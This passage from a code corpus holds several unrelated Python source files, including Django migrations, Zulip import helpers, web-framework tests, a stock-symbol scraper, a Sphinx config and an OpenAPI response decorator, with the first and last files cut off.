details_response = client.jobs(jobkeys = (keys))
return details_response
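# Illustrative only (not part of the original module): a hypothetical query.
# Running it requires a valid INDEED_PUB_ID in the environment and network
# access; the query and location strings are made up for this sketch.
if __name__ == "__main__":
    results = job_search({'q': 'data scientist', 'l': 'Austin, TX'})
    print(results)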
|
py | 1a3f7016224c5885b9f23ef6f0a6ccb405d5c14f | # Generated by Django 3.0.7 on 2020-07-02 01:17
from django.conf import settings
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import uuid
class Migration(migrations.Migration):
initial = True
dependencies = [
('auth', '0011_update_proxy_permissions'),
]
operations = [
migrations.CreateModel(
name='CustomUser',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('password', models.CharField(max_length=128, verbose_name='password')),
('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
('first_name', models.CharField(blank=True, max_length=30, verbose_name='first name')),
('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
('uid', models.UUIDField(default=uuid.uuid4, editable=False, unique=True)),
('channels', models.TextField(blank=True)),
('privs', models.TextField(blank=True)),
('subs', models.TextField(blank=True)),
('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
],
options={
'verbose_name': 'user',
'verbose_name_plural': 'users',
'abstract': False,
},
managers=[
('objects', django.contrib.auth.models.UserManager()),
],
),
migrations.CreateModel(
name='Channel',
fields=[
('cid', models.UUIDField(default=uuid.uuid4, primary_key=True, serialize=False, unique=True)),
('title', models.CharField(max_length=255)),
('slug', models.SlugField(max_length=255, unique=True)),
('vods', models.TextField(blank=True)),
('streamkey', models.UUIDField(default=uuid.uuid4, unique=True)),
('creator', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('moderators', models.ManyToManyField(related_name='moderators', to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | 1a3f705834734bbeba02d8de4ef4a9b26a8043e2 | from rest_framework import permissions
class IsOwnwerOrReadOnly(permissions.BasePermission):
'''
Custom permission to only allow owners of an object
to edit it
'''
def has_object_permission(self, request, view, obj):
        # Read permissions are allowed for any request,
        # so always allow GET, HEAD or OPTIONS requests
if request.method in permissions.SAFE_METHODS:
return True
return obj.owner == request.user |
py | 1a3f716a35069b903cc5b88da4aec9582ada9035 | import random
import requests
import shutil
import logging
import os
from typing import List, Dict, Any, Optional
from django.forms.models import model_to_dict
from zerver.models import Realm, RealmEmoji, Subscription, Recipient, \
Attachment, Stream, Message
from zerver.lib.actions import STREAM_ASSIGNMENT_COLORS as stream_colors
from zerver.lib.avatar_hash import user_avatar_path_from_ids
from zerver.lib.parallel import run_parallel
# stubs
ZerverFieldsT = Dict[str, Any]
def build_zerver_realm(realm_id: int, realm_subdomain: str, time: float,
other_product: str) -> List[ZerverFieldsT]:
realm = Realm(id=realm_id, date_created=time,
name=realm_subdomain, string_id=realm_subdomain,
description=("Organization imported from %s!" % (other_product)))
auth_methods = [[flag[0], flag[1]] for flag in realm.authentication_methods]
realm_dict = model_to_dict(realm, exclude='authentication_methods')
realm_dict['authentication_methods'] = auth_methods
    return [realm_dict]
def build_avatar(zulip_user_id: int, realm_id: int, email: str, avatar_url: str,
timestamp: Any, avatar_list: List[ZerverFieldsT]) -> None:
avatar = dict(
path=avatar_url, # Save original avatar url here, which is downloaded later
realm_id=realm_id,
content_type=None,
user_profile_id=zulip_user_id,
last_modified=timestamp,
user_profile_email=email,
s3_path="",
size="")
avatar_list.append(avatar)
def build_subscription(recipient_id: int, user_id: int,
subscription_id: int) -> ZerverFieldsT:
subscription = Subscription(
color=random.choice(stream_colors),
id=subscription_id)
subscription_dict = model_to_dict(subscription, exclude=['user_profile', 'recipient_id'])
subscription_dict['user_profile'] = user_id
subscription_dict['recipient'] = recipient_id
return subscription_dict
def build_recipient(type_id: int, recipient_id: int, type: int) -> ZerverFieldsT:
recipient = Recipient(
type_id=type_id, # stream id
id=recipient_id,
type=type)
recipient_dict = model_to_dict(recipient)
return recipient_dict
def build_realm(zerver_realm: List[ZerverFieldsT], realm_id: int,
domain_name: str) -> ZerverFieldsT:
realm = dict(zerver_client=[{"name": "populate_db", "id": 1},
{"name": "website", "id": 2},
{"name": "API", "id": 3}],
zerver_customprofilefield=[],
zerver_customprofilefieldvalue=[],
zerver_userpresence=[], # shows last logged in data, which is not available
zerver_userprofile_mirrordummy=[],
zerver_realmdomain=[{"realm": realm_id,
"allow_subdomains": False,
"domain": domain_name,
"id": realm_id}],
zerver_useractivity=[],
zerver_realm=zerver_realm,
zerver_huddle=[],
zerver_userprofile_crossrealm=[],
zerver_useractivityinterval=[],
zerver_reaction=[],
zerver_realmemoji=[],
zerver_realmfilter=[])
return realm
def build_usermessages(zerver_usermessage: List[ZerverFieldsT], usermessage_id: int,
zerver_subscription: List[ZerverFieldsT], recipient_id: int,
mentioned_users_id: List[int], message_id: int) -> int:
for subscription in zerver_subscription:
if subscription['recipient'] == recipient_id:
flags_mask = 1 # For read
if subscription['user_profile'] in mentioned_users_id:
flags_mask = 9 # For read and mentioned
usermessage = dict(
user_profile=subscription['user_profile'],
id=usermessage_id,
flags_mask=flags_mask,
message=message_id)
usermessage_id += 1
zerver_usermessage.append(usermessage)
return usermessage_id
def build_defaultstream(realm_id: int, stream_id: int,
defaultstream_id: int) -> ZerverFieldsT:
defaultstream = dict(
stream=stream_id,
realm=realm_id,
id=defaultstream_id)
return defaultstream
def build_stream(date_created: Any, realm_id: int, name: str,
description: str, stream_id: int, deactivated: bool=False,
invite_only: bool=False) -> ZerverFieldsT:
stream = Stream(
name=name,
deactivated=deactivated,
description=description,
date_created=date_created,
invite_only=invite_only,
id=stream_id)
stream_dict = model_to_dict(stream,
exclude=['realm'])
stream_dict['realm'] = realm_id
return stream_dict
def build_message(subject: str, pub_date: float, message_id: int, content: str,
rendered_content: Optional[str], user_id: int, recipient_id: int,
has_image: bool=False, has_link: bool=False,
has_attachment: bool=True) -> ZerverFieldsT:
zulip_message = Message(
rendered_content_version=1, # this is Zulip specific
subject=subject,
pub_date=pub_date,
id=message_id,
content=content,
rendered_content=rendered_content,
has_image=has_image,
has_attachment=has_attachment,
has_link=has_link)
zulip_message_dict = model_to_dict(zulip_message,
exclude=['recipient', 'sender', 'sending_client'])
zulip_message_dict['sender'] = user_id
zulip_message_dict['sending_client'] = 1
zulip_message_dict['recipient'] = recipient_id
return zulip_message_dict
def build_attachment(realm_id: int, message_id: int, attachment_id: int,
user_id: int, fileinfo: ZerverFieldsT, s3_path: str,
zerver_attachment: List[ZerverFieldsT]) -> None:
"""
This function should be passed a 'fileinfo' dictionary, which contains
information about 'size', 'created' (created time) and ['name'] (filename).
"""
attachment = Attachment(
id=attachment_id,
size=fileinfo['size'],
create_time=fileinfo['created'],
is_realm_public=True,
path_id=s3_path,
file_name=fileinfo['name'])
attachment_dict = model_to_dict(attachment,
exclude=['owner', 'messages', 'realm'])
attachment_dict['owner'] = user_id
attachment_dict['messages'] = [message_id]
attachment_dict['realm'] = realm_id
zerver_attachment.append(attachment_dict)
def process_avatars(avatar_list: List[ZerverFieldsT], avatar_dir: str, realm_id: int,
threads: int, size_url_suffix: str='') -> List[ZerverFieldsT]:
"""
This function gets the avatar of the user and saves it in the
user's avatar directory with both the extensions '.png' and '.original'
Required parameters:
1. avatar_list: List of avatars to be mapped in avatars records.json file
2. avatar_dir: Folder where the downloaded avatars are saved
3. realm_id: Realm ID.
"""
def get_avatar(avatar_upload_list: List[str]) -> int:
avatar_url = avatar_upload_list[0]
image_path = avatar_upload_list[1]
original_image_path = avatar_upload_list[2]
response = requests.get(avatar_url + size_url_suffix, stream=True)
with open(image_path, 'wb') as image_file:
shutil.copyfileobj(response.raw, image_file)
shutil.copy(image_path, original_image_path)
return 0
logging.info('######### GETTING AVATARS #########\n')
logging.info('DOWNLOADING AVATARS .......\n')
avatar_original_list = []
avatar_upload_list = []
for avatar in avatar_list:
avatar_hash = user_avatar_path_from_ids(avatar['user_profile_id'], realm_id)
avatar_url = avatar['path']
avatar_original = dict(avatar)
image_path = ('%s/%s.png' % (avatar_dir, avatar_hash))
original_image_path = ('%s/%s.original' % (avatar_dir, avatar_hash))
avatar_upload_list.append([avatar_url, image_path, original_image_path])
# We don't add the size field here in avatar's records.json,
# since the metadata is not needed on the import end, and we
# don't have it until we've downloaded the files anyway.
avatar['path'] = image_path
avatar['s3_path'] = image_path
avatar_original['path'] = original_image_path
avatar_original['s3_path'] = original_image_path
avatar_original_list.append(avatar_original)
    # Run downloads in parallel
output = []
for (status, job) in run_parallel(get_avatar, avatar_upload_list, threads=threads):
output.append(job)
logging.info('######### GETTING AVATARS FINISHED #########\n')
return avatar_list + avatar_original_list
def process_uploads(upload_list: List[ZerverFieldsT], upload_dir: str,
threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the uploads and saves it in the realm's upload directory.
Required parameters:
1. upload_list: List of uploads to be mapped in uploads records.json file
2. upload_dir: Folder where the downloaded uploads are saved
"""
def get_uploads(upload: List[str]) -> int:
upload_url = upload[0]
upload_path = upload[1]
upload_path = os.path.join(upload_dir, upload_path)
response = requests.get(upload_url, stream=True)
os.makedirs(os.path.dirname(upload_path), exist_ok=True)
with open(upload_path, 'wb') as upload_file:
shutil.copyfileobj(response.raw, upload_file)
return 0
logging.info('######### GETTING ATTACHMENTS #########\n')
logging.info('DOWNLOADING ATTACHMENTS .......\n')
upload_url_list = []
for upload in upload_list:
upload_url = upload['path']
upload_s3_path = upload['s3_path']
upload_url_list.append([upload_url, upload_s3_path])
upload['path'] = upload_s3_path
    # Run downloads in parallel
output = []
for (status, job) in run_parallel(get_uploads, upload_url_list, threads=threads):
output.append(job)
logging.info('######### GETTING ATTACHMENTS FINISHED #########\n')
return upload_list
def process_emojis(zerver_realmemoji: List[ZerverFieldsT], emoji_dir: str,
emoji_url_map: ZerverFieldsT, threads: int) -> List[ZerverFieldsT]:
"""
This function downloads the custom emojis and saves in the output emoji folder.
Required parameters:
1. zerver_realmemoji: List of all RealmEmoji objects to be imported
2. emoji_dir: Folder where the downloaded emojis are saved
3. emoji_url_map: Maps emoji name to its url
"""
def get_emojis(upload: List[str]) -> int:
emoji_url = upload[0]
emoji_path = upload[1]
upload_emoji_path = os.path.join(emoji_dir, emoji_path)
response = requests.get(emoji_url, stream=True)
os.makedirs(os.path.dirname(upload_emoji_path), exist_ok=True)
with open(upload_emoji_path, 'wb') as emoji_file:
shutil.copyfileobj(response.raw, emoji_file)
return 0
emoji_records = []
upload_emoji_list = []
logging.info('######### GETTING EMOJIS #########\n')
logging.info('DOWNLOADING EMOJIS .......\n')
for emoji in zerver_realmemoji:
emoji_url = emoji_url_map[emoji['name']]
emoji_path = RealmEmoji.PATH_ID_TEMPLATE.format(
realm_id=emoji['realm'],
emoji_file_name=emoji['name'])
upload_emoji_list.append([emoji_url, emoji_path])
emoji_record = dict(emoji)
emoji_record['path'] = emoji_path
emoji_record['s3_path'] = emoji_path
emoji_record['realm_id'] = emoji_record['realm']
emoji_record.pop('realm')
emoji_records.append(emoji_record)
    # Run downloads in parallel
output = []
for (status, job) in run_parallel(get_emojis, upload_emoji_list, threads=threads):
output.append(job)
logging.info('######### GETTING EMOJIS FINISHED #########\n')
return emoji_records
|
py | 1a3f71dee3f107f5af11f61afab45c122d7599ad | from ferrisnose import AppEngineWebTest
import wtforms
import json
from ferris.core.controller import Controller, route, route_with
from ferris.core.json_util import DatastoreEncoder
from google.appengine.ext import ndb
# Decorators that make sure @route works correctly even for decorated functions
def std_decorator(f):
def std_wrapper(*args, **kwargs):
return f(*args, **kwargs)
return std_wrapper
def wraps_decorator(f):
from functools import wraps
@wraps(f)
def wraps_wrapper(*args, **kwargs):
return f(*args, **kwargs)
return wraps_wrapper
class TestModel(ndb.Model):
field1 = ndb.StringProperty()
field2 = ndb.StringProperty()
class TestForm(wtforms.Form):
field1 = wtforms.TextField()
field2 = wtforms.TextField()
class TestComponent(object):
def __init__(self, handler):
self.handler = handler
def present(self):
return 'si'
class TestController(Controller):
class Meta:
prefixes = ('monster',)
components = (TestComponent,)
def list(self):
return 'list'
def view(self, key):
return 'view'
def add(self):
return 'add'
def edit(self, key):
return 'edit'
def delete(self, key):
return 204
def monster_list(self):
return 'monster_list'
@route
@wraps_decorator
def monkey(self, key):
return 'monkey-%s' % key
@route
@std_decorator
def monster_monkey(self, key):
return 'monster_monkey-%s' % key
@route_with('/test_controller/monet')
def degas(self):
return 'degas'
@route
def urls(self):
assert self.uri(action='list') == '/test_controller'
assert self.uri(prefix='monster', action='list') == '/monster/test_controller'
assert self.uri(action='edit', key=12) == '/test_controller/%3A12/edit'
assert self.uri('test_controller:list') == '/test_controller'
assert self.uri('monster:test_controller:list') == '/monster/test_controller'
assert self.uri('test_controller:monkey', key=13) == '/test_controller/monkey/13'
return 'success'
@route
def component(self):
return self.components.test_component.present()
@route
def numeric(self):
return 401
@route
def custom_content(self):
self.response.content_type = 'application/json'
return '[1, 2, 3]'
@route
def self_response(self):
self.response.status_int = 401
self.response.body = 'lolidk'
return self.response
@route
def do_redirect(self):
return self.redirect(self.uri('test_controller:list'))
@route
def monster_template_names(self):
return str(self.meta.view.get_template_names())
@route
def form(self):
form = TestForm()
self.parse_request(container=form)
return str(form.data)
class ControllerTest(AppEngineWebTest):
def setUp(self):
super(ControllerTest, self).setUp()
TestController._build_routes(self.testapp.app.router)
def testCrudRoutes(self):
response = self.testapp.get('/test_controller')
self.assertEqual(response.body, 'list')
response = self.testapp.get('/test_controller/add')
self.assertEqual(response.body, 'add')
response = self.testapp.get('/test_controller/:abcd')
self.assertEqual(response.body, 'view')
response = self.testapp.get('/test_controller/:abcd/edit')
self.assertEqual(response.body, 'edit')
response = self.testapp.get('/test_controller/:abcd/delete', status=204)
def testRestRoutes(self):
response = self.testapp.get('/test_controller')
self.assertEqual(response.body, 'list')
response = self.testapp.post('/test_controller')
self.assertEqual(response.body, 'add')
response = self.testapp.get('/test_controller/:abcd')
self.assertEqual(response.body, 'view')
response = self.testapp.put('/test_controller/:abcd')
self.assertEqual(response.body, 'edit')
response = self.testapp.delete('/test_controller/:abcd', status=204)
def testPrefixRoutes(self):
response = self.testapp.get('/monster/test_controller')
self.assertEqual(response.body, 'monster_list')
def testRouteDecorator(self):
response = self.testapp.get('/test_controller/monkey/3')
self.assertEqual(response.body, 'monkey-3')
response = self.testapp.get('/monster/test_controller/monkey/3')
self.assertEqual(response.body, 'monster_monkey-3')
def testRouteWithDecorator(self):
response = self.testapp.get('/test_controller/monet')
self.assertEqual(response.body, 'degas')
def testUrlGeneration(self):
response = self.testapp.get('/test_controller/urls')
self.assertEqual(response.body, 'success')
def testComponents(self):
response = self.testapp.get('/test_controller/component')
self.assertEqual(response.body, 'si')
def testReturnValues(self):
response = self.testapp.get('/test_controller')
assert 'text/html' in response.headers['Content-Type']
self.assertEqual(response.body, 'list')
response = self.testapp.get('/test_controller/numeric', status=401)
response = self.testapp.get('/test_controller/custom_content', status=200)
assert 'application/json' in response.headers['Content-Type']
response = self.testapp.get('/test_controller/self_response', status=401)
self.assertEqual(response.body, 'lolidk')
response = self.testapp.get('/test_controller/do_redirect', status=302)
self.assertEqual(response.headers['Location'], 'http://localhost/test_controller')
def testTemplateNames(self):
response = self.testapp.get('/monster/test_controller/template_names')
self.assertEqual(response.body, str(['test_controller/monster_template_names.html', 'test_controller/template_names.html']))
def testFormDataProcessor(self):
data = {'field2': u'f2', 'field1': u'f1'}
response = self.testapp.post('/test_controller/form', data)
self.assertEqual(response.body, str(data))
data['field3'] = u'f3'
response = self.testapp.post('/test_controller/form', data)
self.assertNotEqual(response.body, str(data), 'Field3 should not be in data')
del data['field3']
data = json.dumps(data, cls=DatastoreEncoder)
response = self.testapp.post('/test_controller/form', data, headers={'Content-Type': 'application/json'})
self.assertTrue('f1' in response)
self.assertTrue('f2' in response)
|
py | 1a3f7252754bcf10e1d747ff1edb266a809f91cd | from app import db
class Usuario(db.Model):
__tablename__ = 'usuarios'
id = db.Column(db.Integer, primary_key=True)
nome = db.Column(db.String(200))
email = db.Column(db.String(200), index=True, unique=True)
senha = db.Column(db.String(200))
admin = db.Column(db.Boolean())
def __repr__(self):
return '<Usuario %s>' % self.nome |
py | 1a3f727725aff897105563f3ce3e50406f30f334 | '''
Created on Jul 25, 2017
@author: Daniel Sela, Arnon Sela
'''
def sixty(scalar, trailsign=False):
'''
;+
; NAME:
; SIXTY()
; PURPOSE:
; Converts a decimal number to sexagesimal.
; EXPLANATION:
; Reverse of the TEN() function.
;
; CALLING SEQUENCE:
; X = SIXTY( SCALAR, [ /TrailSign ] )
;
; INPUTS:
; SCALAR -- Decimal quantity.
; OUTPUTS:
; Function value returned = real vector of three elements,
; sexagesimal equivalent of input decimal quantity. Double
; precision if the input is double, otherwise floating point.
; By default, a negative number is signified by making the first non-zero
; element of the output vection negative, but this can be modified with
; the /TrailSign keyword.
;
; OPTIONAL INPUT KEYWORD:
; /TrailSign - By default, SIXTY() returns a negative sign in the first
; nonzero element. If /TrailSign is set, then SIXTY() will return
; always return a negative sign in the first element, even if it is
; zero
; PROCEDURE:
; Mostly involves checking arguments and setting the sign.
;
; EXAMPLE:
; If x = -0.345d then sixty(x) = [0.0, -20.0, 42.0]
; and sixty(x,True) = [-0.0, 20.0, 42.0]
;-
Changes History:
Added dd range limit - force positive value by complementing to dd_range
prevent adding negative sign to value of 0
'''
if not isinstance(scalar, float):
scalar = float(scalar)
ss = abs(3600.0*scalar)
mm = abs(60.0*scalar)
dd = abs(scalar)
result = [0, 0, 0]
result[0] = int(dd)
result[1] = int(mm-60.0*result[0])
result[2] = ss-3600.0*result[0] - 60.0*result[1]
if scalar < 0:
if trailsign:
result[0] = -result[0]
else:
if result[0] != 0:
result[0] = -result[0]
elif result[1] != 0:
result[1] = -result[1]
elif result[2] != 0:
result[2] = -result[2]
return result
if __name__ == '__main__':
import unittest
from astropy.coordinates import Angle
from astropy import units as u
class TestSixtyMethod(unittest.TestCase):
def test_1(self):
self.assertEqual(sixty(-0.5), [0, -30, 0.0])
def test_2(self):
self.assertEqual(sixty(0.5), [0, 30, 0.0])
def test_3(self):
self.assertEqual(sixty(10.49999), [10, 29, 59.96399999999994])
def test_4(self):
dms = Angle(-0.5, unit=u.deg).dms
result = list(dms._asdict().values())
self.assertEqual(result, [-0.0, -30.0, -0.0])
unittest.main()
|
py | 1a3f72ffac96d80d595a41209fe77b7fa0b1773f | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 18 22:18:27 2021
@author: galin
"""
import string
import requests
from bs4 import BeautifulSoup
import pandas as pd
import time
from tqdm.auto import tqdm
# stock exchange :
# AMEX - American Stock Exchange,
# LSE - London Stock Exchange,
# NASDAQ - NASDAQ Stock Exchange,
# NYSE - New York Stock Exchange,
# SGX - Singapore Stock Exchange
# TSX - Toronto Stock Exchange
def get_indexes (stocks_exchange):
def get_stock_indexes(stock_exchange_name):
base_url="http://eoddata.com/stocklist"
letters_upper_case = list(string.ascii_uppercase)
digits = [x for x in range(10)]
if stock_exchange_name in ['LSE', 'SGX']:
symbols_tabs = digits + letters_upper_case
else:
symbols_tabs = letters_upper_case
df_index_description = pd.DataFrame({'Code':[],
'Name':[]})
urls = [base_url + "/{}/{}.htm".format(stock_exchange_name, letter)
for letter in symbols_tabs ]
html_contents = (requests.get(url).text for url in urls)
with tqdm(total=len(urls)) as pbar:
for html_content in html_contents:
soup = BeautifulSoup(html_content, "lxml")
tables = soup.find_all(lambda tag: tag.name=='table')
read_table = pd.read_html(str(tables[5]))
temp = read_table[0][['Code','Name']]
if(set(temp['Code']).isdisjoint(set(df_index_description['Code']))):
df_index_description = pd.concat([df_index_description
, read_table[0][['Code','Name']]
])
time.sleep(1)
pbar.update(1)
return df_index_description['Code']
df_index_description = pd.DataFrame()
for stocks in stocks_exchange:
df_index_description = pd.concat([df_index_description
, get_stock_indexes(stocks)])
return df_index_description[0].tolist()
|
py | 1a3f736624d7ebca97f6573d68fed32100008f64 | import pyaf.tests.model_control.test_ozone_custom_models_enabled as testmod
testmod.build_model( ['Fisher'] , ['MovingAverage'] , ['Seasonal_DayOfWeek'] , ['SVR'] ); |
py | 1a3f73ccde0dc1ea07cca2d9729597904b2f5b41 | # -*- coding: utf-8 -*-
#
# bebop_autonomy documentation build configuration file, created by
# sphinx-quickstart on Mon Sep 7 15:33:01 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = []
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'bebop_autonomy'
copyright = u'2015, Mani Monajjemi (AutonomyLab, Simon Fraser University)'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = 'indigo-devel'
# The full version, including alpha/beta/rc tags.
release = 'indigo-devel'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'default'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'bebop_autonomydoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'bebop_autonomy.tex', u'bebop\\_autonomy Documentation',
u'Mani Monajjemi', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'bebop_autonomy', u'bebop_autonomy Documentation',
[u'Mani Monajjemi'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'bebop_autonomy', u'bebop_autonomy Documentation',
u'Mani Monajjemi', 'bebop_autonomy', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
on_rtd = os.environ.get('READTHEDOCS', None) == 'True'
if not on_rtd: # only import and set the theme if we're building docs locally
import sphinx_rtd_theme
html_theme = 'sphinx_rtd_theme'
html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
|
py | 1a3f73d1173dc771e60d7801ed221a19b8167443 | import pytest
from pymtl import *
from tests.context import lizard
from lizard.model.test_model import run_test_state_machine
from lizard.util.rtl.lookup_registerfile import LookupRegisterFile, LookupRegisterFileInterface
from lizard.util.fl.lookup_registerfile import LookupRegisterFileFL
def test_state_machine():
run_test_state_machine(
LookupRegisterFile,
LookupRegisterFileFL, (LookupRegisterFileInterface(
Bits(8), Bits(8), 2, 2), [(2, 4), 3], [0, 0]),
translate_model=True)
|
py | 1a3f742397de3882a0c15860a35058cff24d52f7 | import six
from rest_framework import status
def sanitized(schema_key):
if type(schema_key) is tuple:
return schema_key[0]
return schema_key
def key_params(schema_key):
if type(schema_key) is tuple:
return schema_key[1:]
return []
def get_required(schema_keys):
for key in schema_keys:
params = key_params(key)
if 'norequired' in params:
continue
yield sanitized(key)
def get_object_properties(schema):
return {
sanitized(skey): val
for skey, val in schema.items()
}
def parse_schema(schema):
if type(schema) is six.binary_type or type(schema) is six.text_type:
return {
'type': schema,
}
elif type(schema) is list:
return {
'type': 'list',
}
elif type(schema) is dict:
title = schema.get(':title', None)
required_elts = list(get_required(schema.keys()))
properties = get_object_properties(schema)
return {
'type': 'object',
'title': title,
'properties': {
prop_name: parse_schema(subschema)
for prop_name, subschema in properties.items()
},
'required': required_elts,
}
else:
raise Exception('Unsupported schema definition')
def responds(status=status.HTTP_200_OK,
meaning='Undocumented status code',
schema=None,
schema_name=None,
**kwargs):
"""Documents the status code per handled case.
Additional parameters may make it into the OpenAPI documentation
per view. Examples of those parameters include
examples={'application/json': <example>}. As schemata are needed
in order to render the examples in the Web UI, an error will be
signaled if examples= are provided without a schema= parameter.
Schemas can be easily built using a specific syntax.
TODO: Document the syntax here
"""
# TODO: Document syntax in above docstring
if status is None:
status = 'default'
obj = {}
obj['description'] = meaning
if schema:
obj['schema'] = parse_schema(schema)
if schema_name:
obj['schema_name'] = schema_name
obj.update(kwargs)
def decorator(func):
# We do not return a decorator function, we just modify
# in-place our function to have the property that we will look
# forward later for.
if not hasattr(func, '_responses'):
func._responses = {}
func._responses[status] = obj
return func
return decorator
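# Illustrative only (not part of the original module): exercise the schema
# shorthand accepted by parse_schema() above. The field names are invented;
# plain strings describe scalar types, a list describes an array, and a
# ('name', 'norequired') tuple key marks an optional object property.
if __name__ == "__main__":
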